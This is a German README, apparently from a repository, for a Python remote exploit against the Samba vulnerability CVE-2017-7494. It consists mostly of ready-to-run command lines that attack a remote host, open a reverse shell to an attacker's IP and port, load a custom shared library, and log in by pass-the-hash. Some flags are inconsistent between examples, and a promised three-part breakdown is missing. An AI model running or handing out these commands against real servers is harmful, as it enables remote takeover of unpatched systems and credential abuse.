
CVE-2017-7494 Python-Exploit
Remote-Exploit für die SAMBA CVE-2017-7494-Sicherheitslücke, auch bekannt als is_know_pipename!
Dieser Exploit ist in 3 Teile unterteilt:
Solange das Ziel verwundbar ist und der Payload für das Zielbetriebssystem und die Architektur korrekt ist, ist der Exploit recht zuverlässig.
Führen Sie den Exploit gegen Ihr Ziel aus und warten Sie, bis die Shell erscheint:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
Für Samba-Versionen 3.5.0 bis 3.6.0 müssen Sie lediglich das Argument -o 1 hinzufügen.
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
Eigenes benutzerdefiniertes .so ausführen
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
Für einen benutzerdefinierten Samba-Port verwenden Sie das Argument -p
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
Falls Sie auf smbpasswd-Hashes stoßen und diese nicht knacken können, können Sie jetzt Pass-the-Hash mit dem Argument --hashes=LM:NT verwenden.
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
Dieses Repository ist inspiriert von den Repositories: joxeankoret/exploit-CVE-2017-7494 und Archivaldo